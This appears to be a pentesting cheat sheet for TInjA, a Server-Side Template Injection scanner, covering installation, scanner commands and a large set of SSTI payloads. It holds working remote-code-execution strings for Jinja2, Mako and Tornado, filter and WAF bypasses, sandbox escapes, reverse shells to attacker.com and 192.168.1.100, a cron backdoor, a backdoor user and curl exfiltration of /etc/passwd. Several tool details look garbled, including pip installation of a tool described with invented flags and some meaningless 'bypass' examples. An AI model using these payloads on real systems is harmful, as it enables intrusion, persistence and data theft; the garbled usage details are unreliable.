TInjA
Overview
섹션 제목: “Overview”TInjA (Template Injection Analyzer) is a specialized tool for identifying and exploiting Server-Side Template Injection (SSTI) vulnerabilities in web applications. It tests various template engines including Jinja2, Mako, Tornado, Genshi, Cheetah, and Twig by injecting payloads and analyzing responses to determine template engine type and exploit paths.
SSTI vulnerabilities allow attackers to inject template syntax into server-side template processors, potentially leading to arbitrary code execution, information disclosure, and complete system compromise.
Installation
섹션 제목: “Installation”From Kali Linux Repository
섹션 제목: “From Kali Linux Repository”sudo apt-get update
sudo apt-get install tinjaFrom Source
섹션 제목: “From Source”git clone https://github.com/Hackmanit/TInjA.git
cd TInjA
python3 -m pip install -r requirements.txtDocker
섹션 제목: “Docker”docker run -it kalilinux/kali-rolling tinja --helpPython Package
섹션 제목: “Python Package”pip3 install tinjaBasic Usage
섹션 제목: “Basic Usage”| Command | Purpose |
|---|---|
tinja -url URL | Test single URL for SSTI |
tinja -u URL -p PARAM | Test specific parameter |
tinja -l FILE | Test URLs from file list |
tinja -o OUTPUT | Save results to file |
tinja --engine ENGINE | Target specific template engine |
tinja --exploit | Generate exploitation payload |
Command Options
섹션 제목: “Command Options”Target Specification
섹션 제목: “Target Specification”# Single URL testing
tinja -url "http://target.com/page?name=test"
# Specific parameter
tinja -url "http://target.com/page?name=test" -p name
# Custom HTTP method
tinja -url "http://target.com/api" --method POST
# POST data testing
tinja -url "http://target.com/form" --data "user=test&message=test"Advanced Options
섹션 제목: “Advanced Options”# Custom headers
tinja -url "http://target.com" -H "Authorization: Bearer token"
# Proxy configuration
tinja -url "http://target.com" --proxy "http://127.0.0.1:8080"
# SSL verification disable
tinja -url "https://target.com" --insecure
# Custom timeout
tinja -url "http://target.com" --timeout 30Template Engine Detection
섹션 제목: “Template Engine Detection”Detection Methods
섹션 제목: “Detection Methods”# Automatic engine detection
tinja -url "http://target.com/page?user=test"
# Output shows detected engine
# [+] Detected Template Engine: Jinja2
# [+] Vulnerability Type: SSTI| Template Engine | Common Parameters | File Location |
|---|---|---|
| Jinja2 | name, user, search, message | Flask, Django |
| Mako | template, view, page | Pyramid, Turbogears |
| Tornado | item, id, message | Tornado framework |
| Genshi | template, data, content | TurboGears |
| Cheetah | query, template, content | Older Python apps |
| Twig | data, template, page | PHP applications |
| Freemarker | object, model, data | Java applications |
Manual Engine Identification
섹션 제목: “Manual Engine Identification”# Test Jinja2-specific syntax
curl "http://target.com/page?user={{7*7}}"
# Jinja2 returns: 49
# Test Mako-specific syntax
curl "http://target.com/page?user=${7*7}"
# Mako returns: 49
# Test ERB (Ruby) syntax
curl "http://target.com/page?user=<%=7*7%>"
# ERB returns: 49SSTI Payload Testing
섹션 제목: “SSTI Payload Testing”Mathematical Expressions
섹션 제목: “Mathematical Expressions”# Basic arithmetic test
tinja -url "http://target.com/page?name={{7*7}}"
# Boolean logic test
tinja -url "http://target.com/page?name={{1==1}}"
# String concatenation test
tinja -url "http://target.com/page?name={{'hello'+'world'}}"Blind SSTI Detection
섹션 제목: “Blind SSTI Detection”# Time-based blind SSTI
tinja -url "http://target.com/page?name={{range(1000000)}}" --method GET
# String comparison blind test
tinja -url "http://target.com/page?name={%if 1==1%}A{%endif%}B"
# Output should show difference indicating template processingFilter Bypass Techniques
섹션 제목: “Filter Bypass Techniques”# Underscore bypass
{{request.__class__}}
# Bracket notation bypass
{{self[request.args.key]}}
# Concatenation bypass
{{"__cl"+"ass__"}}
# Unicode bypass
{{"__class__"}}
# Hex bypass
{{"\x5f\x5fclass\x5f\x5f"}}Code Execution Payloads
섹션 제목: “Code Execution Payloads”Jinja2 Exploitation
섹션 제목: “Jinja2 Exploitation”# Access object attributes
{{config}}
# File reading
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
# Command execution
{{cycler.__init__.__globals__['os'].popen('whoami').read()}}
# Alternative RCE
{{''.join(request.args.get('cmd')|list)}}
# Reverse shell
tinja -url "http://target.com/page?cmd=nc -e /bin/sh attacker.com 4444"Mako Exploitation
섹션 제목: “Mako Exploitation”# Expression injection
${os.popen('id').read()}
# Python code execution
<%
import os
os.system('whoami')
%>
# File access
${open('/etc/passwd').read()}Tornado Exploitation
섹션 제목: “Tornado Exploitation”# Basic RCE
{%set cmd='id'%}{%set result=os.popen(cmd).read()%}
# Module import
{%import os%}${os.popen('whoami').read()}Information Gathering
섹션 제목: “Information Gathering”Extract Configuration Data
섹션 제목: “Extract Configuration Data”# Get config variables
tinja -url "http://target.com/page?name={{config}}" --exploit
# Access environment
tinja -url "http://target.com/page?name={{environ}}" --exploit
# List available globals
tinja -url "http://target.com/page?name={{globals()}}"File Reading
섹션 제목: “File Reading”# Read /etc/passwd
tinja -url "http://target.com/page?name={{open('/etc/passwd').read()}}"
# Read application files
tinja -url "http://target.com/page?name={{open('../../config.py').read()}}"
# Read environment files
tinja -url "http://target.com/page?name={{open('.env').read()}}"Source Code Disclosure
섹션 제목: “Source Code Disclosure”# Read template source
tinja -url "http://target.com/page?name={{self.module.__loader__.get_source(None, 'app')}}"
# Read Python files
tinja -url "http://target.com/page?name={{open('../app.py').read()}}"Exploitation Workflow
섹션 제목: “Exploitation Workflow”Step-by-Step Exploitation
섹션 제목: “Step-by-Step Exploitation”# 1. Identify vulnerability
tinja -url "http://target.com/page?user=test"
# 2. Detect template engine
# Output indicates Jinja2
# 3. Test basic payload
curl "http://target.com/page?user={{7*7}}"
# 4. Generate RCE payload
tinja -url "http://target.com/page?user=PAYLOAD" --exploit
# 5. Execute payload
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('id').read()}}"
# 6. Establish reverse shell
curl "http://target.com/page?user={{cycler.__init__.__globals__['os'].popen('nc -e /bin/sh 192.168.1.100 4444').read()}}"Batch Testing from File
섹션 제목: “Batch Testing from File”# Create URL list
cat > urls.txt << EOF
http://target.com/page?name=test
http://target.com/search?q=test
http://target.com/user?id=1
EOF
# Test all URLs
tinja -l urls.txt -o results.txt
# Review findings
cat results.txtOutput Analysis
섹션 제목: “Output Analysis”Report Generation
섹션 제목: “Report Generation”# Save detailed report
tinja -url "http://target.com" -o report.txt
# JSON output format
tinja -url "http://target.com" -o report.json --format json
# HTML report
tinja -url "http://target.com" -o report.html --format htmlReport Contents
섹션 제목: “Report Contents”# View discovered vulnerabilities
grep -i "vulnerable\|ssti" report.txt
# Extract payload
grep -i "payload" report.txt
# List affected parameters
grep -i "parameter" report.txtAdvanced Techniques
섹션 제목: “Advanced Techniques”Bypassing Input Filters
섹션 제목: “Bypassing Input Filters”Bypassing Quotes
섹션 제목: “Bypassing Quotes”# String comparison without quotes
{{7*7}}
# Using chr() function
{{chr(72)+chr(101)+chr(108)+chr(108)+chr(111)}}
# Using request.args
{{request.args.get('x')}}Bypassing Blacklists
섹션 제목: “Bypassing Blacklists”# Case manipulation
{{request|safe}}
{{REQUEST|safe}}
# Comment injection
{{request/*bypass*/}}
# Null byte injection
{{request\x00}}
# Unicode normalization
{{request}}Concatenation Bypass
섹션 제목: “Concatenation Bypass”# Escaped concatenation
{{'__cla'+'ss__'}}
# Using format
{{'{}{}'.format('__class__')}}
# Using join
{{''.join(['__','class__'])}}WAF Evasion
섹션 제목: “WAF Evasion”# Obfuscate payload
{{().__class__.__bases__[0].__subclasses__()}}
# Use alternative methods
{{self.__init__.__globals__}}
# Fragment injection
{{requ
est}}
# Newline injection
{{request
.method}}Polyglot Payloads
섹션 제목: “Polyglot Payloads”# Works across multiple engines
{{7*7}}${7*7}<%= 7*7 %>
# Detects engine by response
tinja -url "http://target.com/page?name={{7*7}}" --engine autoPost-Exploitation
섹션 제목: “Post-Exploitation”Establish Persistence
섹션 제목: “Establish Persistence”# Create backdoor
tinja -url "http://target.com/page?name=PAYLOAD" --exploit
# Add cron job
{{os.popen('echo "* * * * * nc -e /bin/sh attacker.com 4444" | crontab -').read()}}
# Create user
{{os.popen('useradd -m -s /bin/bash backdoor').read()}}Data Exfiltration
섹션 제목: “Data Exfiltration”# Read sensitive files
tinja -url "http://target.com/page?name={{open('/var/www/config.php').read()}}"
# Exfiltrate to attacker server
{{os.popen('curl http://attacker.com?data=$(cat /etc/passwd|base64)').read()}}
# Encode output
{{os.popen('cat /etc/passwd | base64').read()}}Defensive Bypass
섹션 제목: “Defensive Bypass”Template Sandbox Escape
섹션 제목: “Template Sandbox Escape”# Access restricted globals
{{().__class__.__bases__[0].__subclasses__()}}
# Import modules in restricted environment
{{__import__('os').popen('id').read()}}
# Use __builtins__
{{__builtins__['eval']('7*7')}}Restricted Characters Bypass
섹션 제목: “Restricted Characters Bypass”# Avoid brackets
{{().__class__.__bases__.__getitem__(0)}}
# Use getattr
{{getattr(request, '__class__')}}
# Use globals
{{self.__init__.__globals__['__builtins__']}}Mitigation Verification
섹션 제목: “Mitigation Verification”Testing Fixes
섹션 제목: “Testing Fixes”# Verify input sanitization
tinja -url "http://target.com/page?name=<test>" -v
# Check output encoding
tinja -url "http://target.com/page?name={{7*7}}" -v
# Validate filter implementation
tinja -url "http://target.com/page?name={{__import__}}"Common Parameters to Test
섹션 제목: “Common Parameters to Test”# URL parameters
?name=test
?user=test
?search=test
?q=test
?id=1
?page=test
# POST fields
username=test
email=test
message=test
title=test
content=test
description=test
# Headers
User-Agent: test
Referer: test
X-Custom-Header: testAutomation Scripts
섹션 제목: “Automation Scripts”Continuous Testing
섹션 제목: “Continuous Testing”#!/bin/bash
# tinja-scan.sh - Automated SSTI scanning
while read url; do
echo "[*] Testing: $url"
tinja -url "$url" -o "results_$(date +%s).txt"
done < urls.txtIntegration with Burp Suite
섹션 제목: “Integration with Burp Suite”# Export Burp requests
# Use Burp to intercept requests
# Convert to tinja format for automated testing
tinja -l burp_export.txt -o burp_results.txtTroubleshooting
섹션 제목: “Troubleshooting”Common Issues
섹션 제목: “Common Issues”| Issue | Solution |
|---|---|
| No detection on known vulnerable app | Try different parameters, adjust timeout |
| False positives | Verify manually with browser, increase precision |
| Connection timeout | Adjust timeout value, check proxy settings |
| SSL errors | Use --insecure flag for self-signed certs |
| No output | Check URL format, verify target is running |
Debug Mode
섹션 제목: “Debug Mode”# Verbose output
tinja -url "http://target.com" -v
# Show all requests
tinja -url "http://target.com" --debug
# Save traffic log
tinja -url "http://target.com" --log traffic.logLegal and Ethical Considerations
섹션 제목: “Legal and Ethical Considerations”- Authorization Required: Only test systems you own or have explicit written permission to test
- Responsible Disclosure: Report findings to vendor/organization before public disclosure
- Compliance: Follow OWASP testing guidelines and legal requirements
- Documentation: Maintain detailed records of all testing activities
- Scope Limitation: Stay within defined testing scope and parameters
Resources
섹션 제목: “Resources”- OWASP SSTI: https://owasp.org/www-community/Server-Side_Template_Injection
- HackTricks SSTI: https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- TInjA GitHub: https://github.com/Hackmanit/TInjA
TInjA is essential for comprehensive web application security assessments, helping identify template injection vulnerabilities that can lead to complete system compromise.